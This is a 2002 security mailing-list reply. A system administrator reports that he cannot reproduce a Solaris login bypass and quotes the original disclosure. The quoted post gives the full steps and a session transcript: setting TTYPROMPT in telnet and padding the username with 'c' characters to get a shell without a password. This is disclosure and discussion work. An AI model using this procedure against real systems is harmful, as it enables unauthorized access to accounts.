Sorry but I can't reproduce this on a Solaris 7 machine. sunlight.ccs% telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. SunOS 5.7 login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword: Login incorrect As you can see I get a request for a username/password. Ramon Kagan York University, Computing and Network Services Unix Team - Intermediate System Administrator (416)736-2100 #20263 rkagan@yorku.ca ------------------------------------- I have not failed. I have just found 10,000 ways that don't work. - Thomas Edison ------------------------------------- On Wed, 2 Oct 2002, Jonathan S wrote: > Hello, > > Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the > environment variable TTYPROMPT. This vulnerability has already been > reported to BugTraq and a patch has been released by Sun. > However, a very simple exploit, which does not require any code to be > compiled by an attacker, exists. The exploit requires the attacker to > simply define the environment variable TTYPROMPT to a 6 character string, > inside telnet. I believe this overflows an integer inside login, which > specifies whether or not the user has been authenticated (just a guess). > Once connected to the remote host, you must type the username, followed by > 64 " c"s, and a literal "\n". You will then be logged in as the user > without any password authentication. This should work with any account > except root (unless remote root login is allowed). > > Example: > > coma% telnet > telnet> environ define TTYPROMPT abcdef > telnet> o localhost > > SunOS 5.8 > > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n > Last login: whenever > $ whoami > bin > > Jonathan Stuart > Network Security Engineer > Computer Consulting Partners, Ltd. > E-mail: jons@ccpartnersltd.com > >
